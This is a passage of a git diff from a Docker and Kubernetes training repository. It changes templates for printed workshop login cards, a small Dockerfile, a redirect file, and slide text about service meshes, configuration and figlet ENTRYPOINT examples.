{%- set this_or_each = "chaque" -%}
|
||||
{%- set plural = "s" -%}
|
||||
{%- set image_src_swarm = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
|
||||
{%- set image_src_kube = "https://avatars1.githubusercontent.com/u/13629408" -%}
|
||||
{%- set image_src = image_src_kube -%}
|
||||
{%- endif -%}
|
||||
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
|
||||
<html>
|
||||
<head><style>
|
||||
@import url('https://fonts.googleapis.com/css?family=Slabo+27px');
|
||||
|
||||
body, table {
|
||||
margin: 0;
|
||||
padding: 0;
|
||||
line-height: 1em;
|
||||
font-size: 15px;
|
||||
font-family: 'Slabo 27px';
|
||||
}
|
||||
|
||||
table {
|
||||
border-spacing: 0;
|
||||
margin-top: 0.4em;
|
||||
margin-bottom: 0.4em;
|
||||
border-left: 0.8em double grey;
|
||||
padding-left: 0.4em;
|
||||
}
|
||||
|
||||
div {
|
||||
float: left;
|
||||
border: 1px dotted black;
|
||||
padding-top: 1%;
|
||||
padding-bottom: 1%;
|
||||
/* columns * (width+left+right) < 100% */
|
||||
width: 30%;
|
||||
padding-left: 1.5%;
|
||||
padding-right: 1.5%;
|
||||
}
|
||||
|
||||
p {
|
||||
margin: 0.4em 0 0.4em 0;
|
||||
}
|
||||
|
||||
img {
|
||||
height: 4em;
|
||||
float: right;
|
||||
margin-right: -0.3em;
|
||||
}
|
||||
|
||||
img.enix {
|
||||
height: 4.0em;
|
||||
margin-top: 0.4em;
|
||||
}
|
||||
|
||||
img.kube {
|
||||
height: 4.2em;
|
||||
margin-top: 1.7em;
|
||||
}
|
||||
|
||||
.logpass {
|
||||
font-family: monospace;
|
||||
font-weight: bold;
|
||||
}
|
||||
|
||||
.pagebreak {
|
||||
page-break-after: always;
|
||||
clear: both;
|
||||
display: block;
|
||||
height: 8px;
|
||||
}
|
||||
</style></head>
|
||||
<body>
|
||||
{% for cluster in clusters %}
|
||||
{% if loop.index0>0 and loop.index0%pagesize==0 %}
|
||||
<span class="pagebreak"></span>
|
||||
{% endif %}
|
||||
<div>
|
||||
|
||||
<p>
|
||||
Voici les informations permettant de se connecter à un
|
||||
des environnements utilisés pour cette formation.
|
||||
Vous pouvez vous connecter à {{ this_or_each }} machine
|
||||
virtuelle avec n'importe quel client SSH.
|
||||
</p>
|
||||
|
||||
<p>
|
||||
<img class="enix" src="https://enix.io/static/img/logos/logo-domain-cropped.png" />
|
||||
<table>
|
||||
<tr><td>cluster:</td></tr>
|
||||
<tr><td class="logpass">{{ clusterprefix }}</td></tr>
|
||||
<tr><td>identifiant:</td></tr>
|
||||
<tr><td class="logpass">docker</td></tr>
|
||||
<tr><td>mot de passe:</td></tr>
|
||||
<tr><td class="logpass">{{ docker_user_password }}</td></tr>
|
||||
</table>
|
||||
</p>
|
||||
|
||||
<p>
|
||||
Adresse{{ plural }} IP :
|
||||
<!--<img class="kube" src="{{ image_src }}" />-->
|
||||
<table>
|
||||
{% for node in cluster %}
|
||||
<tr><td>{{ clusterprefix }}{{ loop.index }}:</td><td>{{ node }}</td></tr>
|
||||
{% endfor %}
|
||||
</table>
|
||||
</p>
|
||||
<p>Le support de formation est à l'adresse suivante :
|
||||
<center>{{ url }}</center>
|
||||
</p>
|
||||
</div>
|
||||
{% endfor %}
|
||||
</body>
|
||||
</html>
|
||||
@@ -1,88 +1,29 @@
|
||||
{# Feel free to customize or override anything in there! #}
|
||||
|
||||
{%- set url = "http://FIXME.container.training/" -%}
|
||||
{%- set pagesize = 9 -%}
|
||||
{%- set lang = "en" -%}
|
||||
{%- set event = "training session" -%}
|
||||
{%- set backside = False -%}
|
||||
{%- set image = "kube" -%}
|
||||
{%- set clusternumber = 100 -%}
|
||||
|
||||
{%- set image_src = {
|
||||
"docker": "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png",
|
||||
"swarm": "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png",
|
||||
"kube": "https://avatars1.githubusercontent.com/u/13629408",
|
||||
"enix": "https://enix.io/static/img/logos/logo-domain-cropped.png",
|
||||
}[image] -%}
|
||||
{%- if lang == "en" and clustersize == 1 -%}
|
||||
{%- set intro -%}
|
||||
Here is the connection information to your very own
|
||||
machine for this {{ event }}.
|
||||
You can connect to this VM with any SSH client.
|
||||
{%- endset -%}
|
||||
{%- set listhead -%}
|
||||
Your machine is:
|
||||
{%- endset -%}
|
||||
{%- endif -%}
|
||||
{%- if lang == "en" and clustersize != 1 -%}
|
||||
{%- set intro -%}
|
||||
Here is the connection information to your very own
|
||||
cluster for this {{ event }}.
|
||||
You can connect to each VM with any SSH client.
|
||||
{%- endset -%}
|
||||
{%- set listhead -%}
|
||||
Your machines are:
|
||||
{%- endset -%}
|
||||
{%- endif -%}
|
||||
{%- if lang == "fr" and clustersize == 1 -%}
|
||||
{%- set intro -%}
|
||||
Voici les informations permettant de se connecter à votre
|
||||
machine pour cette formation.
|
||||
Vous pouvez vous connecter à cette machine virtuelle
|
||||
avec n'importe quel client SSH.
|
||||
{%- endset -%}
|
||||
{%- set listhead -%}
|
||||
Adresse IP:
|
||||
{%- endset -%}
|
||||
{%- endif -%}
|
||||
{%- if lang == "en" and clusterprefix != "node" -%}
|
||||
{%- set intro -%}
|
||||
Here is the connection information for the
|
||||
<strong>{{ clusterprefix }}</strong> environment.
|
||||
{%- endset -%}
|
||||
{%- endif -%}
|
||||
{%- if lang == "fr" and clustersize != 1 -%}
|
||||
{%- set intro -%}
|
||||
Voici les informations permettant de se connecter à votre
|
||||
cluster pour cette formation.
|
||||
Vous pouvez vous connecter à chaque machine virtuelle
|
||||
avec n'importe quel client SSH.
|
||||
{%- endset -%}
|
||||
{%- set listhead -%}
|
||||
Adresses IP:
|
||||
{%- endset -%}
|
||||
{%- endif -%}
|
||||
{%- if lang == "en" -%}
|
||||
{%- set slides_are_at -%}
|
||||
You can find the slides at:
|
||||
{%- endset -%}
|
||||
{%- endif -%}
|
||||
{%- if lang == "fr" -%}
|
||||
{%- set slides_are_at -%}
|
||||
Le support de formation est à l'adresse suivante :
|
||||
{%- endset -%}
|
||||
{%- set url = "http://container.training/" -%}
|
||||
{%- set pagesize = 12 -%}
|
||||
{%- if clustersize == 1 -%}
|
||||
{%- set workshop_name = "Docker workshop" -%}
|
||||
{%- set cluster_or_machine = "machine" -%}
|
||||
{%- set this_or_each = "this" -%}
|
||||
{%- set machine_is_or_machines_are = "machine is" -%}
|
||||
{%- set image_src = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
|
||||
{%- else -%}
|
||||
{%- set workshop_name = "orchestration workshop" -%}
|
||||
{%- set cluster_or_machine = "cluster" -%}
|
||||
{%- set this_or_each = "each" -%}
|
||||
{%- set machine_is_or_machines_are = "machines are" -%}
|
||||
{%- set image_src_swarm = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
|
||||
{%- set image_src_kube = "https://avatars1.githubusercontent.com/u/13629408" -%}
|
||||
{%- set image_src = image_src_swarm -%}
|
||||
{%- endif -%}
|
||||
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
|
||||
<html>
|
||||
<head><style>
|
||||
@import url('https://fonts.googleapis.com/css?family=Slabo+27px');
|
||||
|
||||
body, table {
|
||||
margin: 0;
|
||||
padding: 0;
|
||||
line-height: 1em;
|
||||
font-size: 15px;
|
||||
font-family: 'Slabo 27px';
|
||||
font-size: 14px;
|
||||
}
|
||||
|
||||
table {
|
||||
@@ -96,54 +37,24 @@ table {
|
||||
div {
|
||||
float: left;
|
||||
border: 1px dotted black;
|
||||
{% if backside %}
|
||||
height: 31%;
|
||||
{% endif %}
|
||||
padding-top: 1%;
|
||||
padding-bottom: 1%;
|
||||
/* columns * (width+left+right) < 100% */
|
||||
/*
|
||||
width: 21.5%;
|
||||
padding-left: 1.5%;
|
||||
padding-right: 1.5%;
|
||||
*/
|
||||
/**/
|
||||
width: 30%;
|
||||
padding-left: 1.5%;
|
||||
padding-right: 1.5%;
|
||||
/**/
|
||||
}
|
||||
|
||||
p {
|
||||
margin: 0.4em 0 0.4em 0;
|
||||
}
|
||||
|
||||
div.back {
|
||||
border: 1px dotted white;
|
||||
}
|
||||
|
||||
div.back p {
|
||||
margin: 0.5em 1em 0 1em;
|
||||
}
|
||||
|
||||
img {
|
||||
height: 4em;
|
||||
float: right;
|
||||
margin-right: -0.2em;
|
||||
margin-right: -0.4em;
|
||||
}
|
||||
|
||||
/*
|
||||
img.enix {
|
||||
height: 4.0em;
|
||||
margin-top: 0.4em;
|
||||
}
|
||||
|
||||
img.kube {
|
||||
height: 4.2em;
|
||||
margin-top: 1.7em;
|
||||
}
|
||||
*/
|
||||
|
||||
.logpass {
|
||||
font-family: monospace;
|
||||
font-weight: bold;
|
||||
@@ -158,15 +69,19 @@ img.kube {
|
||||
</style></head>
|
||||
<body>
|
||||
{% for cluster in clusters %}
|
||||
{% if loop.index0>0 and loop.index0%pagesize==0 %}
|
||||
<span class="pagebreak"></span>
|
||||
{% endif %}
|
||||
<div>
|
||||
<p>{{ intro }}</p>
|
||||
|
||||
<p>
|
||||
Here is the connection information to your very own
|
||||
{{ cluster_or_machine }} for this {{ workshop_name }}.
|
||||
You can connect to {{ this_or_each }} VM with any SSH client.
|
||||
</p>
|
||||
<p>
|
||||
<img src="{{ image_src }}" />
|
||||
<table>
|
||||
{% if clusternumber != None %}
|
||||
<tr><td>cluster:</td></tr>
|
||||
<tr><td class="logpass">{{ clusternumber + loop.index }}</td></tr>
|
||||
{% endif %}
|
||||
<tr><td>login:</td></tr>
|
||||
<tr><td class="logpass">docker</td></tr>
|
||||
<tr><td>password:</td></tr>
|
||||
@@ -175,44 +90,17 @@ img.kube {
|
||||
|
||||
</p>
|
||||
<p>
|
||||
{{ listhead }}
|
||||
Your {{ machine_is_or_machines_are }}:
|
||||
<table>
|
||||
{% for node in cluster %}
|
||||
<tr>
|
||||
<td>{{ clusterprefix }}{{ loop.index }}:</td>
|
||||
<td>{{ node }}</td>
|
||||
</tr>
|
||||
<tr><td>node{{ loop.index }}:</td><td>{{ node }}</td></tr>
|
||||
{% endfor %}
|
||||
</table>
|
||||
</p>
|
||||
|
||||
<p>
|
||||
{{ slides_are_at }}
|
||||
<p>You can find the slides at:
|
||||
<center>{{ url }}</center>
|
||||
</p>
|
||||
</div>
|
||||
{% if loop.index%pagesize==0 or loop.last %}
|
||||
<span class="pagebreak"></span>
|
||||
{% if backside %}
|
||||
{% for x in range(pagesize) %}
|
||||
<div class="back">
|
||||
<br/>
|
||||
<p>You got this at the workshop
|
||||
"Getting Started With Kubernetes and Container Orchestration"
|
||||
during QCON London (March 2019).</p>
|
||||
<p>If you liked that workshop,
|
||||
I can train your team or organization
|
||||
on Docker, container, and Kubernetes,
|
||||
with curriculums of 1 to 5 days.
|
||||
</p>
|
||||
<p>Interested? Contact me at:</p>
|
||||
<p>jerome.petazzoni@gmail.com</p>
|
||||
<p>Thank you!</p>
|
||||
</div>
|
||||
{% endfor %}
|
||||
<span class="pagebreak"></span>
|
||||
{% endif %}
|
||||
{% endif %}
|
||||
{% endfor %}
|
||||
</body>
|
||||
</html>
|
||||
|
||||
121
prepare-vms/templates/enix.html
Normal file
@@ -0,0 +1,121 @@
|
||||
{# Feel free to customize or override anything in there! #}
|
||||
{%- set url = "http://FIXME.container.training" -%}
|
||||
{%- set pagesize = 9 -%}
|
||||
{%- if clustersize == 1 -%}
|
||||
{%- set workshop_name = "Docker workshop" -%}
|
||||
{%- set cluster_or_machine = "machine virtuelle" -%}
|
||||
{%- set this_or_each = "cette" -%}
|
||||
{%- set plural = "" -%}
|
||||
{%- set image_src = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
|
||||
{%- else -%}
|
||||
{%- set workshop_name = "Kubernetes workshop" -%}
|
||||
{%- set cluster_or_machine = "cluster" -%}
|
||||
{%- set this_or_each = "chaque" -%}
|
||||
{%- set plural = "s" -%}
|
||||
{%- set image_src_swarm = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
|
||||
{%- set image_src_kube = "https://avatars1.githubusercontent.com/u/13629408" -%}
|
||||
{%- set image_src = image_src_kube -%}
|
||||
{%- endif -%}
|
||||
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
|
||||
<html>
|
||||
<head><style>
|
||||
@import url('https://fonts.googleapis.com/css?family=Slabo+27px');
|
||||
|
||||
body, table {
|
||||
margin: 0;
|
||||
padding: 0;
|
||||
line-height: 1em;
|
||||
font-size: 15px;
|
||||
font-family: 'Slabo 27px';
|
||||
}
|
||||
|
||||
table {
|
||||
border-spacing: 0;
|
||||
margin-top: 0.4em;
|
||||
margin-bottom: 0.4em;
|
||||
border-left: 0.8em double grey;
|
||||
padding-left: 0.4em;
|
||||
}
|
||||
|
||||
div {
|
||||
float: left;
|
||||
border: 1px dotted black;
|
||||
padding-top: 1%;
|
||||
padding-bottom: 1%;
|
||||
/* columns * (width+left+right) < 100% */
|
||||
width: 30%;
|
||||
padding-left: 1.5%;
|
||||
padding-right: 1.5%;
|
||||
}
|
||||
|
||||
p {
|
||||
margin: 0.4em 0 0.4em 0;
|
||||
}
|
||||
|
||||
img {
|
||||
height: 4em;
|
||||
float: right;
|
||||
margin-right: -0.3em;
|
||||
}
|
||||
|
||||
img.enix {
|
||||
height: 4.0em;
|
||||
margin-top: 0.4em;
|
||||
}
|
||||
|
||||
img.kube {
|
||||
height: 4.2em;
|
||||
margin-top: 1.7em;
|
||||
}
|
||||
|
||||
.logpass {
|
||||
font-family: monospace;
|
||||
font-weight: bold;
|
||||
}
|
||||
|
||||
.pagebreak {
|
||||
page-break-after: always;
|
||||
clear: both;
|
||||
display: block;
|
||||
height: 8px;
|
||||
}
|
||||
</style></head>
|
||||
<body>
|
||||
{% for cluster in clusters %}
|
||||
{% if loop.index0>0 and loop.index0%pagesize==0 %}
|
||||
<span class="pagebreak"></span>
|
||||
{% endif %}
|
||||
<div>
|
||||
|
||||
<p>
|
||||
Voici les informations permettant de se connecter à votre
|
||||
{{ cluster_or_machine }} pour cette formation.
|
||||
Vous pouvez vous connecter à {{ this_or_each }} machine virtuelle
|
||||
avec n'importe quel client SSH.
|
||||
</p>
|
||||
<p>
|
||||
<img class="enix" src="https://enix.io/static/img/logos/logo-domain-cropped.png" />
|
||||
<table>
|
||||
<tr><td>identifiant:</td></tr>
|
||||
<tr><td class="logpass">docker</td></tr>
|
||||
<tr><td>mot de passe:</td></tr>
|
||||
<tr><td class="logpass">{{ docker_user_password }}</td></tr>
|
||||
</table>
|
||||
|
||||
</p>
|
||||
<p>
|
||||
Adresse{{ plural }} IP :
|
||||
<!--<img class="kube" src="{{ image_src }}" />-->
|
||||
<table>
|
||||
{% for node in cluster %}
|
||||
<tr><td>node{{ loop.index }}:</td><td>{{ node }}</td></tr>
|
||||
{% endfor %}
|
||||
</table>
|
||||
</p>
|
||||
<p>Le support de formation est à l'adresse suivante :
|
||||
<center>{{ url }}</center>
|
||||
</p>
|
||||
</div>
|
||||
{% endfor %}
|
||||
</body>
|
||||
</html>
|
||||
134
prepare-vms/templates/jerome.html
Normal file
@@ -0,0 +1,134 @@
|
||||
{# Feel free to customize or override anything in there! #}
|
||||
{%- set url = "http://qconuk2019.container.training/" -%}
|
||||
{%- set pagesize = 9 -%}
|
||||
{%- if clustersize == 1 -%}
|
||||
{%- set workshop_name = "Docker workshop" -%}
|
||||
{%- set cluster_or_machine = "machine" -%}
|
||||
{%- set this_or_each = "this" -%}
|
||||
{%- set machine_is_or_machines_are = "machine is" -%}
|
||||
{%- set image_src = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
|
||||
{%- else -%}
|
||||
{%- set workshop_name = "Kubernetes workshop" -%}
|
||||
{%- set cluster_or_machine = "cluster" -%}
|
||||
{%- set this_or_each = "each" -%}
|
||||
{%- set machine_is_or_machines_are = "machines are" -%}
|
||||
{%- set image_src_swarm = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
|
||||
{%- set image_src_kube = "https://avatars1.githubusercontent.com/u/13629408" -%}
|
||||
{%- set image_src = image_src_kube -%}
|
||||
{%- endif -%}
|
||||
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
|
||||
<html>
|
||||
<head><style>
|
||||
@import url('https://fonts.googleapis.com/css?family=Slabo+27px');
|
||||
body, table {
|
||||
margin: 0;
|
||||
padding: 0;
|
||||
line-height: 1.0em;
|
||||
font-size: 15px;
|
||||
font-family: 'Slabo 27px';
|
||||
}
|
||||
|
||||
table {
|
||||
border-spacing: 0;
|
||||
margin-top: 0.4em;
|
||||
margin-bottom: 0.4em;
|
||||
border-left: 0.8em double grey;
|
||||
padding-left: 0.4em;
|
||||
}
|
||||
|
||||
div {
|
||||
float: left;
|
||||
border: 1px dotted black;
|
||||
height: 31%;
|
||||
padding-top: 1%;
|
||||
padding-bottom: 1%;
|
||||
/* columns * (width+left+right) < 100% */
|
||||
width: 30%;
|
||||
padding-left: 1.5%;
|
||||
padding-right: 1.5%;
|
||||
}
|
||||
|
||||
div.back {
|
||||
border: 1px dotted white;
|
||||
}
|
||||
|
||||
div.back p {
|
||||
margin: 0.5em 1em 0 1em;
|
||||
}
|
||||
|
||||
p {
|
||||
margin: 0.4em 0 0.8em 0;
|
||||
}
|
||||
|
||||
img {
|
||||
height: 5em;
|
||||
float: right;
|
||||
margin-right: 1em;
|
||||
}
|
||||
|
||||
.logpass {
|
||||
font-family: monospace;
|
||||
font-weight: bold;
|
||||
}
|
||||
|
||||
.pagebreak {
|
||||
page-break-after: always;
|
||||
clear: both;
|
||||
display: block;
|
||||
height: 8px;
|
||||
}
|
||||
</style></head>
|
||||
<body>
|
||||
{% for cluster in clusters %}
|
||||
<div>
|
||||
|
||||
<p>
|
||||
Here is the connection information to your very own
|
||||
{{ cluster_or_machine }} for this {{ workshop_name }}.
|
||||
You can connect to {{ this_or_each }} VM with any SSH client.
|
||||
</p>
|
||||
<p>
|
||||
<img src="{{ image_src }}" />
|
||||
<table>
|
||||
<tr><td>login:</td></tr>
|
||||
<tr><td class="logpass">docker</td></tr>
|
||||
<tr><td>password:</td></tr>
|
||||
<tr><td class="logpass">{{ docker_user_password }}</td></tr>
|
||||
</table>
|
||||
|
||||
</p>
|
||||
<p>
|
||||
Your {{ machine_is_or_machines_are }}:
|
||||
<table>
|
||||
{% for node in cluster %}
|
||||
<tr><td>node{{ loop.index }}:</td><td>{{ node }}</td></tr>
|
||||
{% endfor %}
|
||||
</table>
|
||||
</p>
|
||||
<p>You can find the slides at:
|
||||
<center>{{ url }}</center>
|
||||
</p>
|
||||
</div>
|
||||
{% if loop.index%pagesize==0 or loop.last %}
|
||||
<span class="pagebreak"></span>
|
||||
{% for x in range(pagesize) %}
|
||||
<div class="back">
|
||||
<br/>
|
||||
<p>You got this at the workshop
|
||||
"Getting Started With Kubernetes and Container Orchestration"
|
||||
during QCON London (March 2019).</p>
|
||||
<p>If you liked that workshop,
|
||||
I can train your team or organization
|
||||
on Docker, container, and Kubernetes,
|
||||
with curriculums of 1 to 5 days.
|
||||
</p>
|
||||
<p>Interested? Contact me at:</p>
|
||||
<p>jerome.petazzoni@gmail.com</p>
|
||||
<p>Thank you!</p>
|
||||
</div>
|
||||
{% endfor %}
|
||||
<span class="pagebreak"></span>
|
||||
{% endif %}
|
||||
{% endfor %}
|
||||
</body>
|
||||
</html>
|
||||
106
prepare-vms/templates/kube101.html
Normal file
@@ -0,0 +1,106 @@
|
||||
{# Feel free to customize or override anything in there! #}
|
||||
{%- set url = "http://container.training/" -%}
|
||||
{%- set pagesize = 12 -%}
|
||||
{%- if clustersize == 1 -%}
|
||||
{%- set workshop_name = "Docker workshop" -%}
|
||||
{%- set cluster_or_machine = "machine" -%}
|
||||
{%- set this_or_each = "this" -%}
|
||||
{%- set machine_is_or_machines_are = "machine is" -%}
|
||||
{%- set image_src = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
|
||||
{%- else -%}
|
||||
{%- set workshop_name = "Kubernetes workshop" -%}
|
||||
{%- set cluster_or_machine = "cluster" -%}
|
||||
{%- set this_or_each = "each" -%}
|
||||
{%- set machine_is_or_machines_are = "machines are" -%}
|
||||
{%- set image_src_swarm = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
|
||||
{%- set image_src_kube = "https://avatars1.githubusercontent.com/u/13629408" -%}
|
||||
{%- set image_src = image_src_kube -%}
|
||||
{%- endif -%}
|
||||
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
|
||||
<html>
|
||||
<head><style>
|
||||
body, table {
|
||||
margin: 0;
|
||||
padding: 0;
|
||||
line-height: 1em;
|
||||
font-size: 14px;
|
||||
}
|
||||
|
||||
table {
|
||||
border-spacing: 0;
|
||||
margin-top: 0.4em;
|
||||
margin-bottom: 0.4em;
|
||||
border-left: 0.8em double grey;
|
||||
padding-left: 0.4em;
|
||||
}
|
||||
|
||||
div {
|
||||
float: left;
|
||||
border: 1px dotted black;
|
||||
padding-top: 1%;
|
||||
padding-bottom: 1%;
|
||||
/* columns * (width+left+right) < 100% */
|
||||
width: 21.5%;
|
||||
padding-left: 1.5%;
|
||||
padding-right: 1.5%;
|
||||
}
|
||||
|
||||
p {
|
||||
margin: 0.4em 0 0.4em 0;
|
||||
}
|
||||
|
||||
img {
|
||||
height: 4em;
|
||||
float: right;
|
||||
margin-right: -0.4em;
|
||||
}
|
||||
|
||||
.logpass {
|
||||
font-family: monospace;
|
||||
font-weight: bold;
|
||||
}
|
||||
|
||||
.pagebreak {
|
||||
page-break-after: always;
|
||||
clear: both;
|
||||
display: block;
|
||||
height: 8px;
|
||||
}
|
||||
</style></head>
|
||||
<body>
|
||||
{% for cluster in clusters %}
|
||||
{% if loop.index0>0 and loop.index0%pagesize==0 %}
|
||||
<span class="pagebreak"></span>
|
||||
{% endif %}
|
||||
<div>
|
||||
|
||||
<p>
|
||||
Here is the connection information to your very own
|
||||
{{ cluster_or_machine }} for this {{ workshop_name }}.
|
||||
You can connect to {{ this_or_each }} VM with any SSH client.
|
||||
</p>
|
||||
<p>
|
||||
<img src="{{ image_src }}" />
|
||||
<table>
|
||||
<tr><td>login:</td></tr>
|
||||
<tr><td class="logpass">docker</td></tr>
|
||||
<tr><td>password:</td></tr>
|
||||
<tr><td class="logpass">{{ docker_user_password }}</td></tr>
|
||||
</table>
|
||||
|
||||
</p>
|
||||
<p>
|
||||
Your {{ machine_is_or_machines_are }}:
|
||||
<table>
|
||||
{% for node in cluster %}
|
||||
<tr><td>node{{ loop.index }}:</td><td>{{ node }}</td></tr>
|
||||
{% endfor %}
|
||||
</table>
|
||||
</p>
|
||||
<p>You can find the slides at:
|
||||
<center>{{ url }}</center>
|
||||
</p>
|
||||
</div>
|
||||
{% endfor %}
|
||||
</body>
|
||||
</html>
|
||||
@@ -1,4 +1,7 @@
FROM alpine:3.9
RUN apk add --no-cache entr py-pip git
FROM alpine
RUN apk update
RUN apk add entr
RUN apk add py-pip
RUN apk add git
COPY requirements.txt .
RUN pip install -r requirements.txt
@@ -1,8 +1,4 @@
# Uncomment and/or edit one of the following lines if necessary.
#/ /kube-halfday.yml.html 200
#/ /kube-fullday.yml.html 200
/ /kube-fullday.yml.html 200!
#/ /kube-twodays.yml.html 200
/ /k8s-201.yml.html 200!

# And this allows to do "git clone https://container.training".
/info/refs service=git-upload-pack https://github.com/jpetazzo/container.training/info/refs?service=git-upload-pack
@@ -150,7 +150,7 @@ Different deployments will use different underlying technologies.
|
||||
* Ad-hoc deployments can use a master-less discovery protocol
|
||||
like avahi to register and discover services.
|
||||
* It is also possible to do one-shot reconfiguration of the
|
||||
ambassadors. It is slightly less dynamic but has far fewer
|
||||
ambassadors. It is slightly less dynamic but has much less
|
||||
requirements.
|
||||
* Ambassadors can be used in addition to, or instead of, overlay networks.
|
||||
|
||||
@@ -186,48 +186,22 @@ Different deployments will use different underlying technologies.
|
||||
|
||||
---
|
||||
|
||||
## Some popular service meshes
|
||||
## Section summary
|
||||
|
||||
... And related projects:
|
||||
We've learned how to:
|
||||
|
||||
* [Consul Connect](https://www.consul.io/docs/connect/index.html)
|
||||
<br/>
|
||||
Transparently secures service-to-service connections with mTLS.
|
||||
* Understand the ambassador pattern and what it is used for (service portability).
|
||||
|
||||
* [Gloo](https://gloo.solo.io/)
|
||||
<br/>
|
||||
API gateway that can interconnect applications on VMs, containers, and serverless.
|
||||
For more information about the ambassador pattern, including demos on Swarm and ECS:
|
||||
|
||||
* AWS re:invent 2015 [DVO317](https://www.youtube.com/watch?v=7CZFpHUPqXw)
|
||||
|
||||
* [SwarmWeek video about Swarm+Compose](https://youtube.com/watch?v=qbIvUvwa6As)
|
||||
|
||||
Some services meshes and related projects:
|
||||
|
||||
* [Istio](https://istio.io/)
|
||||
<br/>
|
||||
A popular service mesh.
|
||||
|
||||
* [Linkerd](https://linkerd.io/)
|
||||
<br/>
|
||||
Another popular service mesh.
|
||||
|
||||
---
|
||||
|
||||
## Learning more about service meshes
|
||||
|
||||
A few blog posts about service meshes:
|
||||
|
||||
* [Containers, microservices, and service meshes](http://jpetazzo.github.io/2019/05/17/containers-microservices-service-meshes/)
|
||||
<br/>
|
||||
Provides historical context: how did we do before service meshes were invented?
|
||||
|
||||
* [Do I Need a Service Mesh?](https://www.nginx.com/blog/do-i-need-a-service-mesh/)
|
||||
<br/>
|
||||
Explains the purpose of service meshes. Illustrates some NGINX features.
|
||||
|
||||
* [Do you need a service mesh?](https://www.oreilly.com/ideas/do-you-need-a-service-mesh)
|
||||
<br/>
|
||||
Includes high-level overview and definitions.
|
||||
|
||||
* [What is Service Mesh and Why Do We Need It?](https://containerjournal.com/2018/12/12/what-is-service-mesh-and-why-do-we-need-it/)
|
||||
<br/>
|
||||
Includes a step-by-step demo of Linkerd.
|
||||
|
||||
And a video:
|
||||
|
||||
* [What is a Service Mesh, and Do I Need One When Developing Microservices?](https://www.datawire.io/envoyproxy/service-mesh/)
|
||||
* [Gloo](https://gloo.solo.io/)
|
||||
|
||||
@@ -98,13 +98,13 @@ COPY prometheus.conf /etc
|
||||
|
||||
* Allows arbitrary customization and complex configuration files.
|
||||
|
||||
* Requires writing a configuration file. (Obviously!)
|
||||
* Requires to write a configuration file. (Obviously!)
|
||||
|
||||
* Requires building an image to start the service.
|
||||
* Requires to build an image to start the service.
|
||||
|
||||
* Requires rebuilding the image to reconfigure the service.
|
||||
* Requires to rebuild the image to reconfigure the service.
|
||||
|
||||
* Requires rebuilding the image to upgrade the service.
|
||||
* Requires to rebuild the image to upgrade the service.
|
||||
|
||||
* Configured images can be stored in registries.
|
||||
|
||||
@@ -132,11 +132,11 @@ docker run -v appconfig:/etc/appconfig myapp
|
||||
|
||||
* Allows arbitrary customization and complex configuration files.
|
||||
|
||||
* Requires creating a volume for each different configuration.
|
||||
* Requires to create a volume for each different configuration.
|
||||
|
||||
* Services with identical configurations can use the same volume.
|
||||
|
||||
* Doesn't require building / rebuilding an image when upgrading / reconfiguring.
|
||||
* Doesn't require to build / rebuild an image when upgrading / reconfiguring.
|
||||
|
||||
* Configuration can be generated or edited through another container.
|
||||
|
||||
@@ -198,4 +198,4 @@ E.g.:
|
||||
|
||||
- read the secret on stdin when the service starts,
|
||||
|
||||
- pass the secret using an API endpoint.
|
||||
- pass the secret using an API endpoint.
|
||||
@@ -257,7 +257,7 @@ $ docker kill 068 57ad
|
||||
The `stop` and `kill` commands can take multiple container IDs.
|
||||
|
||||
Those containers will be terminated immediately (without
|
||||
the 10-second delay).
|
||||
the 10 seconds delay).
|
||||
|
||||
Let's check that our containers don't show up anymore:
|
||||
|
||||
|
||||
@@ -222,16 +222,16 @@ CMD ["hello world"]
|
||||
Let's build it:
|
||||
|
||||
```bash
|
||||
$ docker build -t myfiglet .
|
||||
$ docker build -t figlet .
|
||||
...
|
||||
Successfully built 6e0b6a048a07
|
||||
Successfully tagged myfiglet:latest
|
||||
Successfully tagged figlet:latest
|
||||
```
|
||||
|
||||
Run it without parameters:
|
||||
|
||||
```bash
|
||||
$ docker run myfiglet
|
||||
$ docker run figlet
|
||||
_ _ _ _
|
||||
| | | | | | | | |
|
||||
| | _ | | | | __ __ ,_ | | __|
|
||||
@@ -246,7 +246,7 @@ $ docker run myfiglet
|
||||
Now let's pass extra arguments to the image.
|
||||
|
||||
```bash
|
||||
$ docker run myfiglet hola mundo
|
||||
$ docker run figlet hola mundo
|
||||
_ _
|
||||
| | | | |
|
||||
| | __ | | __, _ _ _ _ _ __| __
|
||||
@@ -262,13 +262,13 @@ We overrode `CMD` but still used `ENTRYPOINT`.
|
||||
|
||||
What if we want to run a shell in our container?
|
||||
|
||||
We cannot just do `docker run myfiglet bash` because
|
||||
We cannot just do `docker run figlet bash` because
|
||||
that would just tell figlet to display the word "bash."
|
||||
|
||||
We use the `--entrypoint` parameter:
|
||||
|
||||
```bash
|
||||
$ docker run -it --entrypoint bash myfiglet
|
||||
$ docker run -it --entrypoint bash figlet
|
||||
root@6027e44e2955:/#
|
||||
```
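For reference, a minimal Dockerfile consistent with the behavior shown above might look like this (the actual Dockerfile from the earlier slides is not part of this diff, so the font option is an assumption):

```dockerfile
FROM ubuntu
RUN apt-get update && apt-get install -y figlet && apt-get clean
# ENTRYPOINT provides the command; CMD provides default arguments
# that `docker run myfiglet <args>` overrides, as demonstrated above.
ENTRYPOINT ["figlet", "-f", "script"]
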